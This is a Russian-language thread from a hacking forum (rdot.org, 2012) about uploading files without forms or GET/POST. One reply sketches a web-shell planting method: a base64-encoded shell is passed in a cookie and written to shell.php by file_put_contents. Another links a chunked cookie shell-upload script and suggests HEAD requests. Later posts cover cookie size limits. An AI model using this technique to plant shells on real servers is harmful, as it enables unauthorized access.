Старый 20.07.2012, 02:07   #1
Sharp
 
Регистрация: 19.07.2012
Сообщений: 0
Репутация: -3
Lightbulb Замена $_FILES->$_COOKIE

Добрая ночь, уважаемые Rdot'шники
У кого какие будут идеи, как закачать файл на сервер (со своего компьютера), не используя контейнер <form></form> и методы GET/POST ?!
Или, это невозможно?! Лично я не смог придумать, как сотворить данное.
Спасибо за помощь!

З.Ы Неважно, можно не использовать штатные методы, главное чтобы была схема веб-сайт->загрузка файл со своего компьютера на данный сервер
__________________
:good3:

Последний раз редактировалось Sharp; 20.07.2012 в 02:08.. Причина: Добавление P.S
Sharp вне форума   Ответить с цитированием
Старый 20.07.2012, 08:45   #2
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

base64_encode('<?php код шелла; ?>') => код_шелла_в_base64

SetCookie("code","код_шелла_в_base64");

<?php
file_put_contents('shell.php',base64_decode($_COOK IE["code"]));
?>
Ereeee вне форума   Ответить с цитированием
Старый 20.07.2012, 11:01   #3
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Скрипт для заливки шелла через куки по частям
https://rdot.org/forum/showthread.php?t=1280

Модифицируй отправляющий скрипт на работу через HEAD вместо GET и вперёд.
tipsy вне форума   Ответить с цитированием
Старый 20.07.2012, 11:43   #4
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

немного оффтопа: ищи маленькие шеллы, емнип максимальный размер одной куки - 4 килобайта.
12309 вне форума   Ответить с цитированием
Старый 20.07.2012, 12:03   #5
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

4 килобайта - это nginx, в апаче 8. Но многие браузеры куки такого размера не держат.
tipsy вне форума   Ответить с цитированием
Старый 20.07.2012, 12:34   #6
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

http://manicode.blogspot.com/2009/08/real-world-cookie-length-limits.html
Цитата:
Saturday, August 8, 2009
Real world cookie length limits
Here's a few results from various browsers:

Firefox 3.0.12: 4000
Firefox 3.5: 4000
curl 7.19.5: 4999
IE 8: 5000
Opera 10.00 beta: 4000
Android 1.5 browser: 4000
Chrome 3.0.195.6: 4000
Wget 1.11.4: 7000[*]
mobile safari (iphone): 8000
lynx 2.8.7dev.9: 4000
http://www.ietf.org/rfc/rfc2965.txt
Цитата:
5.3 Implementation Limits

Practical user agent implementations have limits on the number and
size of cookies that they can store. In general, user agents' cookie
support should have no fixed limits. They should strive to store as
many frequently-used cookies as possible. Furthermore, general-use
user agents SHOULD provide each of the following minimum capabilities
individually, although not necessarily simultaneously:

* at least 300 cookies

* at least 4096 bytes per cookie (as measured by the characters
that comprise the cookie non-terminal in the syntax description
of the Set-Cookie2 header, and as received in the Set-Cookie2
header)

* at least 20 cookies per unique host or domain name

User agents created for specific purposes or for limited-capacity
devices SHOULD provide at least 20 cookies of 4096 bytes, to ensure
that the user can interact with a session-based origin server.
DrakonHaSh вне форума   Ответить с цитированием
Старый 20.07.2012, 14:54   #7
Sharp
 
Регистрация: 19.07.2012
Сообщений: 0
Репутация: -3
По умолчанию

парни, мне не нужно шелл лить, я прекрасно знаю как это делать.
Мне нужно именно подобная замена. Код закачиваемого файла мне не вручную вписывать надо, а надо нажать "обзор", выбрать файл и закачать... )
__________________
:good3:
Sharp вне форума   Ответить с цитированием
Старый 20.07.2012, 15:04   #8
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Мне нужно именно подобная замена. Код закачиваемого файла мне не вручную вписывать надо, а надо нажать "обзор", выбрать файл и закачать... )
хм? На C++, раз со своего компа? Вы даже не представляете, насколько несвязно вы пишите. Уверен, никто не понял, что вам надо в итоге. Учите русский и логику

Цитата:
Необходимость ТЗ

Исходное задание выдаётся заказчиком. Основными причинами, заставляющими его обратиться к разработчику, являются отсутствие у заказчика соответствующих специальных знаний либо ограниченность его ресурсов (нехватка времени на решение задачи, необходимого количества людей, оборудования).

Задание может быть чётко определено, например, когда всю работу ведет один человек, либо оно выдано авторитетным специалистом, либо не может быть подвергнуто сомнению (госзаказ). Но чаще оно формулируется в общих чертах на языке потребителя-неспециалиста, далёким от языка разработчика и терминов предметной области. Неопределенные требования вызывают неуверенность у всех участников работ, так как допускают различное толкование требований и не позволят объективно оценить качество разработанного изделия. Также, разработчик должен понимать, что заказчик может не знать (или знает частично) специальных требований, что не снимает с разработчика ответственности и обязательности выполнения требований надзорных органов независимо от их наличия в задании. Таким образом, не только заказчик, но и разработчик (исполнитель) являются ответственными за постановку целей разработки и полезность ее результата.

Последний раз редактировалось Pashkela; 20.07.2012 в 15:08..
Pashkela вне форума   Ответить с цитированием
Старый 20.07.2012, 15:06   #9
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Похоже, проблему решит только HTML с ассемблерными вставками.
tipsy вне форума   Ответить с цитированием
Старый 20.07.2012, 15:32   #10
Sharp
 
Регистрация: 19.07.2012
Сообщений: 0
Репутация: -3
По умолчанию

Проект грубо говоря под грифом TOP Secret. В общем, объясню ещё разок.
Как заливают файлы обычным способом:
PHP код:
<form method=POST[...или GET]>
<
input type='file' name='name'>
<
input type='submit' value='GO'>
</
form
Затем на сервере через суперглобальную переменную $_FILES мы проводим манипуляции, чтобы закачать искомое на удалённый сервер.

Так вот, а мне категорически запрещено использовать POST/GET методы, а также контейнер <form>.
Также на моём компьютере (Не на удалённом сервере, куда закачивать), не должно стоять дополнительного ПО, нужно чтобы это работало с любого компьютера. Ну и собственно, подозреваю, что устроить такое невозможно... Только если юзать промежуточный сервер например.

P.S
Цитата:
Сообщение от tipsy
неумение внятно сформулировать вопрос
Просто сложно объяснить данный вопрос, поэтому объясняюсь, как могу. Как бы вы объяснили подобное?!


З.З.Ы <input type='file' name='name'> использовать можно
__________________
:good3:

Последний раз редактировалось Sharp; 20.07.2012 в 15:45..
Sharp вне форума   Ответить с цитированием
Ответ

Метки
$_cookie, $_files, закачка, залить, куки

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot